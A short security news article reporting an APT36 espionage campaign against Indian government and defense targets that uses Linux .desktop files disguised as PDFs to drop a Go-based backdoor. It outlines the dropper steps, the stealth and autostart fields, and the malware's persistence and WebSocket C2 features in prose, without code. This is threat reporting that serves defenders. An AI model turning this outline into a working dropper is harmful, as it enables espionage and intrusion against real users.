APT36 Exploits Linux .desktop Files for Espionage Malware in Ongoing Cyber Attacks

 

The Pakistani threat group APT36 has launched new cyber-espionage attacks targeting India’s government and defense sectors by abusing Linux .desktop files to deploy malware.

According to recent reports from CYFIRMA and CloudSEK, the campaign—first detected on August 1, 2025—is still active. Researchers highlight that this activity focuses on data theft, long-term surveillance, and persistent backdoor access. Notably, APT36 has a history of using .desktop files in espionage operations across South Asia.

Abuse of Linux Desktop Files

Victims receive phishing emails containing ZIP archives with a disguised .desktop file masquerading as a PDF. Once opened, the file triggers a hidden bash command that fetches a hex-encoded payload from an attacker-controlled server or Google Drive, writes it into /tmp/, makes it executable with chmod +x, and launches it in the background.

To avoid suspicion, the malware also opens Firefox to display a decoy PDF hosted online. Attackers manipulated fields like Terminal=false to hide terminal windows and X-GNOME-Autostart-enabled=true for persistence at every login.

While .desktop files are typically harmless text-based launchers defining icons and commands, APT36 weaponized them as malware droppers and persistence mechanisms—a method similar to how Windows LNK shortcuts are exploited.

The dropped malware is a Go-based ELF executable with espionage capabilities. Despite obfuscation, researchers confirmed it can:

• Remain hidden,
• Achieve persistence via cron jobs and systemd services,
• Establish C2 communication through a bi-directional WebSocket channel for remote command execution and data exfiltration.

Both cybersecurity firms conclude that APT36 is evolving its tactics, becoming increasingly evasive, stealthy, and sophisticated, making detection on Linux environments difficult since .desktop abuse is rarely monitored by security tools.